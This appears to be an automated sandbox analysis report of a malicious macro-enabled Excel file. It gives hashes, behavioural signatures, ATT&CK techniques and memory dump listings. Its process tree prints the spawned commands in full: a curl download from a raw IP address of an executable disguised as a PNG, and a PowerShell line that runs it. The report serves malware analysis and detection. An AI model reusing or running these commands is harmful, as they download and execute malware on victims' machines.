Analysis

  • max time kernel
    145s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-07-2021 19:25

General

  • Target

    306b49ee2d7c8b286e5ff5334c84352d2d7fa39681f4f5349026cb1d1dbf9366.xlsm

  • Size

    140KB

  • MD5

    6bf05c7bf2922c92b590ccd9f81adead

  • SHA1

    80e46189cde0ffa29e0b587a4fa23a826a260048

  • SHA256

    306b49ee2d7c8b286e5ff5334c84352d2d7fa39681f4f5349026cb1d1dbf9366

  • SHA512

    0edad497446975d976ffd98c1cd0ad2c3f64c84910721669e49cc9ba08b9d7c0862759146603654e14f07b48991e0d33168f07a234369c253507caf000c14985

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\306b49ee2d7c8b286e5ff5334c84352d2d7fa39681f4f5349026cb1d1dbf9366.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe start-sleep 10; $x=$env:AppData+'\qRKZS.exe';Invoke-Expression $x
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2628
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c curl http://151.236.30.123/images/suntogether.png -o %appdata%\qRKZS.exe
      2⤵
      • Process spawned unexpected child process
      PID:3016

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2628-274-0x0000000000000000-mapping.dmp
  • memory/2628-300-0x00000206EB576000-0x00000206EB578000-memory.dmp
    Filesize

    8KB

  • memory/2628-293-0x00000206EB573000-0x00000206EB575000-memory.dmp
    Filesize

    8KB

  • memory/2628-292-0x00000206EB570000-0x00000206EB572000-memory.dmp
    Filesize

    8KB

  • memory/2628-285-0x00000206EB680000-0x00000206EB681000-memory.dmp
    Filesize

    4KB

  • memory/2628-280-0x00000206EB390000-0x00000206EB391000-memory.dmp
    Filesize

    4KB

  • memory/3016-275-0x0000000000000000-mapping.dmp
  • memory/3972-117-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmp
    Filesize

    64KB

  • memory/3972-123-0x0000017F5F670000-0x0000017F61565000-memory.dmp
    Filesize

    31.0MB

  • memory/3972-121-0x00007FF8E9170000-0x00007FF8EA25E000-memory.dmp
    Filesize

    16.9MB

  • memory/3972-122-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmp
    Filesize

    64KB

  • memory/3972-118-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmp
    Filesize

    64KB

  • memory/3972-114-0x00007FF69A700000-0x00007FF69DCB6000-memory.dmp
    Filesize

    53.7MB

  • memory/3972-116-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmp
    Filesize

    64KB

  • memory/3972-115-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmp
    Filesize

    64KB